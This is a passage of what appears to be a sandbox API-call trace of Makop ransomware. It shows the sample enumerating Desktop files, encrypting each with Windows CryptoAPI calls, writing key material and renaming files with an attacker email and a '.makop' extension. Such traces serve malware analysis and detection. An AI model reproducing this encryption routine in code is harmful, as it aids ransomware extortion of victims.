returned 1 [0127.864] CryptDestroyKey (hKey=0x56c9b0) returned 1 [0127.864] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x14e74, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.864] SetEndOfFile (hFile=0xa4) returned 1 [0127.873] GetProcessHeap () returned 0x550000 [0127.873] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0127.873] GetProcessHeap () returned 0x550000 [0127.873] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.874] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\WnZ24EI.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\wnz24ei.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\WnZ24EI.gif.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\wnz24ei.gif.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.875] CloseHandle (hObject=0xa4) returned 1 [0127.875] FindNextFileW (in: hFindFile=0x56c880, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1a611c0, ftCreationTime.dwHighDateTime=0x1d5e107, ftLastAccessTime.dwLowDateTime=0x64fed660, ftLastAccessTime.dwHighDateTime=0x1d5e65c, ftLastWriteTime.dwLowDateTime=0x64fed660, ftLastWriteTime.dwHighDateTime=0x1d5e65c, nFileSizeHigh=0x0, nFileSizeLow=0x7c51, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="y rPNrYYhJ0p7_gbDk.jpg", cAlternateFileName="YRPNRY~1.JPG")) returned 1 [0127.875] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\y rPNrYYhJ0p7_gbDk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\y rpnryyhj0p7_gbdk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0127.875] GetProcessHeap () returned 0x550000 [0127.875] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.875] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.875] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fa28 | out: lpNewFilePointer=0x0) returned 1 [0127.875] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa38*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa38*, lpNumberOfBytesWritten=0x245fa08*=0xf, lpOverlapped=0x0) returned 1 [0127.876] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fa0c | out: phKey=0x245fa0c*=0x56c9b0) returned 1 [0127.877] CryptSetKeyParam (hKey=0x56c9b0, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.877] GetProcessHeap () returned 0x550000 [0127.877] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0127.877] CryptEncrypt (in: hKey=0x56c9b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245f9f0*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245f9f0*=0x50) returned 1 [0127.877] CryptDestroyKey (hKey=0x56c9b0) returned 1 [0127.877] WriteFile (in: hFile=0xa4, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fa08*=0x50, lpOverlapped=0x0) returned 1 [0127.877] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa10*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa10*, lpNumberOfBytesWritten=0x245fa08*=0x4, lpOverlapped=0x0) returned 1 [0127.877] WriteFile (in: hFile=0xa4, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fa08*=0x10, lpOverlapped=0x0) returned 1 [0127.877] WriteFile (in: hFile=0xa4, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fa08*=0x80, lpOverlapped=0x0) returned 1 [0127.877] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fa30 | out: lpNewFilePointer=0x0) returned 1 [0127.878] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa20*, lpNumberOfBytesWritten=0x245fa08*=0x8, lpOverlapped=0x0) returned 1 [0127.878] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fa0c | out: phKey=0x245fa0c*=0x56c9b0) returned 1 [0127.878] CryptSetKeyParam (hKey=0x56c9b0, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.878] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.878] ReadFile (in: hFile=0xa4, lpBuffer=0x2250020, nNumberOfBytesToRead=0x7c51, lpNumberOfBytesRead=0x245fa14, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fa14*=0x7c51, lpOverlapped=0x0) returned 1 [0127.878] CryptEncrypt (in: hKey=0x56c9b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f9f0*=0x7c60, dwBufLen=0x7c60 | out: pbData=0x2250020*, pdwDataLen=0x245f9f0*=0x7c60) returned 1 [0127.879] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.879] WriteFile (in: hFile=0xa4, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fa08*=0x7c60, lpOverlapped=0x0) returned 1 [0127.879] CryptDestroyKey (hKey=0x56c9b0) returned 1 [0127.879] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x7d44, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.879] SetEndOfFile (hFile=0xa4) returned 1 [0127.883] GetProcessHeap () returned 0x550000 [0127.883] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0127.883] GetProcessHeap () returned 0x550000 [0127.883] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.883] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\y rPNrYYhJ0p7_gbDk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\y rpnryyhj0p7_gbdk.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\y rPNrYYhJ0p7_gbDk.jpg.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\y rpnryyhj0p7_gbdk.jpg.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.884] CloseHandle (hObject=0xa4) returned 1 [0127.901] FindNextFileW (in: hFindFile=0x56c880, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1a611c0, ftCreationTime.dwHighDateTime=0x1d5e107, ftLastAccessTime.dwLowDateTime=0x64fed660, ftLastAccessTime.dwHighDateTime=0x1d5e65c, ftLastWriteTime.dwLowDateTime=0x64fed660, ftLastWriteTime.dwHighDateTime=0x1d5e65c, nFileSizeHigh=0x0, nFileSizeLow=0x7c51, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="y rPNrYYhJ0p7_gbDk.jpg", cAlternateFileName="YRPNRY~1.JPG")) returned 0 [0127.901] FindClose (in: hFindFile=0x56c880 | out: hFindFile=0x56c880) returned 1 [0127.901] GetProcessHeap () returned 0x550000 [0127.901] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x591d80 | out: hHeap=0x550000) returned 1 [0127.901] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dc51200, ftCreationTime.dwHighDateTime=0x1d5da74, ftLastAccessTime.dwLowDateTime=0x8bc7e1a0, ftLastAccessTime.dwHighDateTime=0x1d5d8cf, ftLastWriteTime.dwLowDateTime=0x8bc7e1a0, ftLastWriteTime.dwHighDateTime=0x1d5d8cf, nFileSizeHigh=0x0, nFileSizeLow=0xc44c, dwReserved0=0x0, dwReserved1=0xffff, cFileName="hwbze4Iaxr.flv", cAlternateFileName="HWBZE4~1.FLV")) returned 1 [0127.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hwbze4Iaxr.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hwbze4iaxr.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0127.902] GetProcessHeap () returned 0x550000 [0127.902] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.902] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.902] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0127.902] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0127.903] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.903] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.903] GetProcessHeap () returned 0x550000 [0127.903] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0127.903] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0127.903] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.903] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0127.903] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0127.903] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0127.903] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0127.903] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0127.903] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0127.903] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.903] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.903] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.903] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0xc44c, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0xc44c, lpOverlapped=0x0) returned 1 [0127.904] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0xc450, dwBufLen=0xc450 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0xc450) returned 1 [0127.904] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.904] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xc450, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0xc450, lpOverlapped=0x0) returned 1 [0127.905] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.905] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xc524, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.905] SetEndOfFile (hFile=0xac) returned 1 [0127.959] GetProcessHeap () returned 0x550000 [0127.959] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0127.959] GetProcessHeap () returned 0x550000 [0127.959] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.959] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hwbze4Iaxr.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hwbze4iaxr.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hwbze4Iaxr.flv.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hwbze4iaxr.flv.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.050] CloseHandle (hObject=0xac) returned 1 [0128.050] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b0d77d0, ftCreationTime.dwHighDateTime=0x1d5e16d, ftLastAccessTime.dwLowDateTime=0x93105290, ftLastAccessTime.dwHighDateTime=0x1d5d888, ftLastWriteTime.dwLowDateTime=0x93105290, ftLastWriteTime.dwHighDateTime=0x1d5d888, nFileSizeHigh=0x0, nFileSizeLow=0x1837, dwReserved0=0x0, dwReserved1=0xffff, cFileName="I4ERgdk4b7-y6ha.mp3", cAlternateFileName="I4ERGD~1.MP3")) returned 1 [0128.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I4ERgdk4b7-y6ha.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i4ergdk4b7-y6ha.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.050] GetProcessHeap () returned 0x550000 [0128.050] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.050] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.050] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.050] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x9, lpOverlapped=0x0) returned 1 [0128.052] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.052] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.052] GetProcessHeap () returned 0x550000 [0128.052] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0128.052] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50) returned 1 [0128.052] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.052] WriteFile (in: hFile=0xac, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fc90*=0x50, lpOverlapped=0x0) returned 1 [0128.053] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.053] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.053] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.053] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.053] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.053] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.053] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.053] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.053] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x1837, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x1837, lpOverlapped=0x0) returned 1 [0128.054] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x1840, dwBufLen=0x1840 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x1840) returned 1 [0128.054] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.054] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x1840, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x1840, lpOverlapped=0x0) returned 1 [0128.054] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.054] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x1924, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.054] SetEndOfFile (hFile=0xac) returned 1 [0128.058] GetProcessHeap () returned 0x550000 [0128.058] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0128.058] GetProcessHeap () returned 0x550000 [0128.058] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.058] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I4ERgdk4b7-y6ha.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i4ergdk4b7-y6ha.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I4ERgdk4b7-y6ha.mp3.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i4ergdk4b7-y6ha.mp3.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.065] CloseHandle (hObject=0xac) returned 1 [0128.065] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb30e8d0, ftCreationTime.dwHighDateTime=0x1d5dc65, ftLastAccessTime.dwLowDateTime=0xf42d65d0, ftLastAccessTime.dwHighDateTime=0x1d5e18a, ftLastWriteTime.dwLowDateTime=0xf42d65d0, ftLastWriteTime.dwHighDateTime=0x1d5e18a, nFileSizeHigh=0x0, nFileSizeLow=0xa9b4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="i7z5HWiZn8rb.bmp", cAlternateFileName="I7Z5HW~1.BMP")) returned 1 [0128.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\i7z5HWiZn8rb.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i7z5hwizn8rb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.066] GetProcessHeap () returned 0x550000 [0128.066] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.066] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.066] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.066] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0xc, lpOverlapped=0x0) returned 1 [0128.067] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.067] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.067] GetProcessHeap () returned 0x550000 [0128.067] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0128.067] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0128.067] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.067] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0128.067] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.067] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.067] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.067] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.067] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.067] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.067] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.068] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.068] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0xa9b4, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0xa9b4, lpOverlapped=0x0) returned 1 [0128.068] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0xa9c0, dwBufLen=0xa9c0 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0xa9c0) returned 1 [0128.068] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.068] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xa9c0, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, 